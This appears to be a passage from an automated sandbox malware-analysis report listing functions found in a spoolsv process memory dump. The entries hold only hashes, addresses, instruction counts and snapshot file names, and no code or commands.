Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df4a9b66ad34f1797897d2bfaffaead482ea74e27bc7b4f3e928188156566bc1
Instruction ID: 0ee82e1f6f88077e6db0415792a0786207d5f271604fb2c416cb8481dfbdd6cc
Opcode Fuzzy Hash: df4a9b66ad34f1797897d2bfaffaead482ea74e27bc7b4f3e928188156566bc1
Instruction Fuzzy Hash: 5E116D3090DA4E9FEB98EF6888592B97BB0FF68742F0405BBD409D61D2DB39A444CB40

Function 00007FF848F423A1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ef9e0446d4bfe230d09f71fe766813ef1c42ae88c2dbd2d252eb692f8014bd
Instruction ID: e086150fd9b5bc2a9c44dc522cd6c811b4f832cb956d4f84ba964b5f9b70c783
Opcode Fuzzy Hash: 62ef9e0446d4bfe230d09f71fe766813ef1c42ae88c2dbd2d252eb692f8014bd
Instruction Fuzzy Hash: CA11B8309086498FDB88EF68C89A1F93BE0FF68701F01027FE80AD3281CB34A550CB84

Function 00007FF848F46BD1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d151d1d0e538519f3fa24d8af8e0fe38c27d468a5845fad2b4d051568d3947ae
Instruction ID: 41dedc7c670894cc376fa147be93560af5ac8780629013f7b8c162a961667127
Opcode Fuzzy Hash: d151d1d0e538519f3fa24d8af8e0fe38c27d468a5845fad2b4d051568d3947ae
Instruction Fuzzy Hash: A1116D3090D64E9FEB99EF28C8592B97BA0FF68342F0405BBD409D6592DB39A584CB41

Function 00007FF848F44619 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97097e1f4c0a62eb3a1e0b43bb0ac9589532b68aa342228d25eeb4fc6791622
Instruction ID: f80c72fb11a3dadcc5d6488de489fcac5fd160f10f87cc9553403be702c5ca11
Opcode Fuzzy Hash: a97097e1f4c0a62eb3a1e0b43bb0ac9589532b68aa342228d25eeb4fc6791622
Instruction Fuzzy Hash: 1721903080E64A9FEB89EF28C4592BDBBB0FF69345F0401BBD419E61D2DB38A440CB41

Function 00007FF848F446B5 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103320e9a6582050786a2e770c37eb31fe636807535ac9e6c36cd41447702818
Instruction ID: b571fdbd0d3ce5fb063d244262d947d4951496b3433e3f7d6dd461cac76f0a02
Opcode Fuzzy Hash: 103320e9a6582050786a2e770c37eb31fe636807535ac9e6c36cd41447702818
Instruction Fuzzy Hash: BF117F3080E64E9FEB89EF2884592B97BA0FF69345F1405BFD409E71D2DB39A440C741

Function 00007FF848F44B55 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02385afbcbb12accdc8dc4b21fbfcbcb0ee5b14fdaf96eb7080e72552bf9b978
Instruction ID: 97a47b4a5c7501274bd341a8887a9f643710e5e71db4610279fd4688317e967f
Opcode Fuzzy Hash: 02385afbcbb12accdc8dc4b21fbfcbcb0ee5b14fdaf96eb7080e72552bf9b978
Instruction Fuzzy Hash: 4C11B23190EA898FE759EB64889A2B87AA0FF29709F0404BFD009A65D2DB296454C715

Function 00007FF848F3C7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a174e791341d935e6f67e8776a94254f2ed2db0bd9675bb4365ffbb8ef5eed
Instruction ID: a2ccac912411414c0fc23e3fd8ae63fcfefe27d8ae5f84876731102d0f67b3a0
Opcode Fuzzy Hash: f9a174e791341d935e6f67e8776a94254f2ed2db0bd9675bb4365ffbb8ef5eed
Instruction Fuzzy Hash: 8D116A3080D68E9FEB86FB6898581BA7BB0FF19341F0405BBD809C71E2EB386950C754

Function 00007FF848F46D15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16cfdf1dbc266878b733a0470e274454ffceefd3722c04d6f46639d0e6ac6448
Instruction ID: dda48daba704b8552a9c11b1e423be715e298cdfe8dbc9b07e5980ecd3806cbf
Opcode Fuzzy Hash: 16cfdf1dbc266878b733a0470e274454ffceefd3722c04d6f46639d0e6ac6448
Instruction Fuzzy Hash: B611B271D0DA898FE79AEB6488A92B87BF0FF25300F0404BFC419D65D2DF2A6444CB05

Function 00007FF848F44EC9 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c30bc175ea8693d6e7466e74ca70f0e5c3534af35c31f51819fc222ef21eae
Instruction ID: b6b5727700376d42714b05c43e9031c71301eb54c8e93e352a6cfb9d55b019a1
Opcode Fuzzy Hash: c9c30bc175ea8693d6e7466e74ca70f0e5c3534af35c31f51819fc222ef21eae
Instruction Fuzzy Hash: 7311903080E68A8FEB45EF6484592B97BF0FF29355F0404BBC409E71E2DB396984CB51

Function 00007FF848F472F1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554af6e3f8d0962011575f7fe8d5eed46efa27a43db470b5ea5afd53f045189f
Instruction ID: 74954facc6fc0ef610419be3b19e41f7a63481de6dc7b9825bf25fdaddf9feae
Opcode Fuzzy Hash: 554af6e3f8d0962011575f7fe8d5eed46efa27a43db470b5ea5afd53f045189f
Instruction Fuzzy Hash: 3B117C3080C94E9FEB51FB74C8486B97BF0FF29741F0445B6D809D70A1EB38A5848B54

Function 00007FF848F46DAD Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56eb1a5080c8500af397ab83e0d21d7ed89709690676d2b343f2584ba646991a
Instruction ID: 3f7853b6a3e9304cfd3d670126f1d708e2b398115c9a5077047338d6ae574c04
Opcode Fuzzy Hash: 56eb1a5080c8500af397ab83e0d21d7ed89709690676d2b343f2584ba646991a
Instruction Fuzzy Hash: 26119A3090DA4A8FEB89EF24C4592B97BB0FF69741F4400BBD40AD21D2EB2AA4548B44

Function 00007FF848F42791 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505375e2a01acb6046c2faac288b574a55de3c32d7a7f7baef0ef8131e6e337e
Instruction ID: 7b8e01c71e68700b65b619b05a07f215f41cf83a76d2c0016b4ac68ab769fe49
Opcode Fuzzy Hash: 505375e2a01acb6046c2faac288b574a55de3c32d7a7f7baef0ef8131e6e337e
Instruction Fuzzy Hash: 3011A13081C54E8FE742FB68844C5F97BE1FF19351F1404B7D408D7092EB34A1848751

Function 00007FF848F44C7D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f6dba446f802e5d5d0df5d37e96d6dfe0aac6898d5863e17dcaba2361648f1
Instruction ID: b042f9c74af3e27f377327a5fc2f12f18cf36424694039b9d19f8e2b154bac37
Opcode Fuzzy Hash: 50f6dba446f802e5d5d0df5d37e96d6dfe0aac6898d5863e17dcaba2361648f1
Instruction Fuzzy Hash: 73118F3080E64A9FEB45EB6484592B97BF0FF38705F0805BBD409E65D6EB356444C741

Function 00007FF848F334E5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
Instruction ID: f8c75c6b68c10cbd9abf6dc1df5483d5fd4916286a136421455c9a426e0932ea
Opcode Fuzzy Hash: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
Instruction Fuzzy Hash: EA11397090868E8FDB89EF68C8596BA7BA0FF18301F0409BAD41AC61D2DB35A540C704

Function 00007FF848F3BA85 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8f8bdd0e11dc3efffc85a909fbf04a214ba2f97b835c6211ecc41eac223203
Instruction ID: 189dc0eafbea90077d6c6a154d76d14873786151469954104ef8c92164a59df5
Opcode Fuzzy Hash: 6f8f8bdd0e11dc3efffc85a909fbf04a214ba2f97b835c6211ecc41eac223203
Instruction Fuzzy Hash: 0B113970918A4E8FEB95FF6888692BABBE0FF18341F0404BBD80AC6191EB35A550C704

Function 00007FF848F45F69 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df2f11d5ee56b2bea31488fb90cf5ec472e973913deef8b287187a63a5b78b59
Instruction ID: 4652713776d4c82b06a59b51833370b44cac65cbfd974068d0b9293bd2433f56
Opcode Fuzzy Hash: df2f11d5ee56b2bea31488fb90cf5ec472e973913deef8b287187a63a5b78b59
Instruction Fuzzy Hash: 13119E31D0D68A9FE742FB2488592A9BBE0FF29351F0405B7C408D70D6EB38A5448746

Function 00007FF848F44E3D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bbcb43ff426051269d2024ebd6eb8ac9a12536bfcd0fbb6c55dd99cb4d0994
Instruction ID: 5f92669d0859927b72cb174cc67a9993c65e770c8b783260aea78e1b33e9bd3a
Opcode Fuzzy Hash: e3bbcb43ff426051269d2024ebd6eb8ac9a12536bfcd0fbb6c55dd99cb4d0994
Instruction Fuzzy Hash: 5411A33090EA4E8FEB45EB2484596B97BE1FF28345F4404BBD419E31D2DF39A580C701

Function 00007FF848F32E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
Instruction ID: 46729d5223554c0bd981ae4357964a1022507cc6b933d757906cfc9921d209fc
Opcode Fuzzy Hash: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
Instruction Fuzzy Hash: 86017831D0D68E9FE751FB68884A6A97BE0EF59342F0508B7D80CC61E2EB38E4848704

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
Instruction ID: aa2eab45af054f73055000d7dc97be5733e3fb122e6714e01d018da07946b569
Opcode Fuzzy Hash: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
Instruction Fuzzy Hash: C0019E3090890E8FEB48EF64C4596BAB7A1FF58386F50447EE40EC22C0CB31A590CB44

Function 00007FF848F3BF0A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804f6484fc710651ee6143f8b1ad440defe4d8b83e7d25ad13cf897444fccde5
Instruction ID: 84067421ad50b82ee785928e3d05bf33be7279ea89d9d11d6c9913380d91b0bb
Opcode Fuzzy Hash: 804f6484fc710651ee6143f8b1ad440defe4d8b83e7d25ad13cf897444fccde5
Instruction Fuzzy Hash: 2B01297092894E9EEB98FF6884692B97AA0FF18341F10047BD41EC6191DB31A550CB04

Function 00007FF848F47ABD Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80642d5b8a7f6da08b2129f1f5c4f9a1d0b4d1d2f474acec8df624e8583323b2
Instruction ID: 3f2c70a4be22a3598cc26007cbcf1e8062391e25a3624d3c685774184a5482be
Opcode Fuzzy Hash: 80642d5b8a7f6da08b2129f1f5c4f9a1d0b4d1d2f474acec8df624e8583323b2
Instruction Fuzzy Hash: DA01F13084DA8D8FDB49EF24C4581BA7BA0FF28744F0404BBD40AD70E2EB75A940CB40

Function 00007FF848F3283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
Instruction ID: 1c4ccfaa58656c3748b478608dcde3c08716ff8e4a1c22d7bf0b30d9f64bd852
Opcode Fuzzy Hash: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
Instruction Fuzzy Hash: 4C018B3085D64E9FE795FB6884886B97BE0FF59342F5504B7D408C70A2EB38E0408704

Function 00007FF848F47A49 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3e4011a2c9ed59f4e767c9ebd7e2ea3549d74d113b0be701dc59d3a843eba1
Instruction ID: 3c21777da8250d192541bf02eee59d15384c0ce76a006db326ce194f6038a38e
Opcode Fuzzy Hash: 9b3e4011a2c9ed59f4e767c9ebd7e2ea3549d74d113b0be701dc59d3a843eba1
Instruction Fuzzy Hash: A701923084D68D4FDB55AB2484692BDBBA0FF25345F0504FFD409D60E2DB75A554C741

Function 00007FF848F32ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
Instruction ID: 0aab06960ecf77e6019811eed53df505c651e1856fc102b1245d61f21c80c88a
Opcode Fuzzy Hash: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
Instruction Fuzzy Hash: 8E018F31D1D6898FE742BB7488592A97FE0EF5A342F0604F7D808CB0E6EB38A4448711

Function 00007FF848F47479 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be92025cf559d6ba05db21ed8d797af9515d38facbd8ce2b3c659732dd1df58
Instruction ID: b26f4972f6942ee2a6af875d3662e68ba2f4085751465fb6d7443023e45f32cb
Opcode Fuzzy Hash: 2be92025cf559d6ba05db21ed8d797af9515d38facbd8ce2b3c659732dd1df58
Instruction Fuzzy Hash: BA01713090EA8D9FE752BB7484595B97FE0EF6A340F1504F7D408C70B2EB38A5548711

Function 00007FF848F3A819 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112694ded4aff2da4883e0c651655607011233365ca729bf8654e3e4361bd3bf
Instruction ID: 419f613e7f5aba6a48c65c03bdf4d5574ab07fbacb87bfde52504e2d986f0ef8
Opcode Fuzzy Hash: 112694ded4aff2da4883e0c651655607011233365ca729bf8654e3e4361bd3bf
Instruction Fuzzy Hash: 4F01783084EB895FE752BB2498591A97BE0EF5A340F1608B7D408CB0A2EB28A484C701

Function 00007FF848F31CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
Instruction ID: 62f1e554b909a9cda948264f822e6a866c4baf550f1094d114af8428cc7baa95
Opcode Fuzzy Hash: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
Instruction Fuzzy Hash: 2101FF3080D68E8FEB99EF2488592FA7BA0FF55341F4000BEE808C22C2DB35D490C744

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
Instruction ID: e99e20a613dc8426e70129a5c3a52498749959ddaa4778b58202b305723cb82c
Opcode Fuzzy Hash: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
Instruction Fuzzy Hash: EA01693091860E9EEB59FFA884586BE76A1FF18346F50087EE40EC61D1EF35A190C604

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
Instruction ID: d03e00fe451eb5642abc3ce5f6623f7478fac096096f1766979655766ccf2dd0
Opcode Fuzzy Hash: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
Instruction Fuzzy Hash: 35016930919A0E9EEB59FB6484592B9B6E0FF18346F20487FE40EC21D1DF39A550C614

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
Instruction ID: 6c1773de4df031a049bb746555071ee6d070705278b5cc1f806c81fc3f4089e0
Opcode Fuzzy Hash: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
Instruction Fuzzy Hash: E5F06D3081E64E8FEB95EF6494152FA77A4FF15389F50457AF80DC22C1DB39A5A0CB88

Function 00007FF848F32759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
Instruction ID: 27cdfefb2d28d74907dbc0ab21325ccc7f9008d7d64202602453ef763a79e55b
Opcode Fuzzy Hash: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
Instruction Fuzzy Hash: 8FF0623180E78A8FEB5AAF6488591A93BA1FF16341F4504BBD449C61D2EB38A454C741

Function 00007FF848F3AFCB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f3a000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a3465bba0c7e39527f6fced4cb0f9de0bfe6fd11ff8cdc08fbf25c7bca0afb
Instruction ID: b07d3b661bb284db920168cc5d0a97a0bbcb0e44b1264f88559fd63986b49132
Opcode Fuzzy Hash: a5a3465bba0c7e39527f6fced4cb0f9de0bfe6fd11ff8cdc08fbf25c7bca0afb
Instruction Fuzzy Hash: BAF0E770D199198FEB90EB28C446BE9B3B1FF58380F1082A6C40DD3196CB34AAC18F44

Function 00007FF848F327CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
Instruction ID: c329ae4e80c3759325399ba9f5f38cf91314f3fd784a932d0f242b3d9667f407
Opcode Fuzzy Hash: 25e647b769f549d33492ea3f74376b5a7eed0a0315be7732eb23ebd53a11eaea
Instruction Fuzzy Hash: DBF0BE7080E78E8FEB59AF6488292BD7BA0FF15306F4544BFE809C60D2EB39A454C741

Function 00007FF848F30F7D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f30000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a0c87765cda1a6993e2fe57a4d8743617b7252e48901c217407dd211bd8697
Instruction ID: 0a13003e177fd3022cdc3e56d69e851994582da8d6e5fba068169434ac73e99a
Opcode Fuzzy Hash: 67a0c87765cda1a6993e2fe57a4d8743617b7252e48901c217407dd211bd8697
Instruction Fuzzy Hash: 80F03A3090E51A8FEB50FB14C894BEEB7B1EB94351F105276D40DE32D5DF3869848B98

Function 00007FF848F414AC Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37efdfc19629e391198d7d1322049dd488c8871099144e6f4d712aa68319741b
Instruction ID: 4642d596df29f829413cd667ee6b44414d5db07309888377e6bf3d4ddd181390
Opcode Fuzzy Hash: 37efdfc19629e391198d7d1322049dd488c8871099144e6f4d712aa68319741b
Instruction Fuzzy Hash: 40E0EC70C0C22D8FEB559F50C8543ED76B1EF10740F00523AD009AB1C0DBB81984CF48

Function 00007FF848F41814 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2277420332.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff848f41000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db71e81f5869626451fae5988b1e68b5d80d8d67456325b5f1ff72a3660e349
Instruction ID: b6af72e65e79655acffbf1a0cc325f8058ae93e325bcedb6e95ccd0a79ae3f95
Opcode Fuzzy Hash: 9db71e81f5869626451fae5988b1e68b5d80d8d67456325b5f1ff72a3660e349
Instruction Fuzzy Hash: E3D0C77490D1554FD7459F208C586ED7A61EF51340F0411BED04D5B1D2DB741554CF55

Non-executed Functions

Function 00007FF848F3EC5F Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

6, xrefs: 00007FF848F3EC9F
], xrefs: 00007FF848F3ED07
^, xrefs: 00007FF848F3ED9D
V, xrefs: 00007FF848F3ED3C

Memory Dump Source

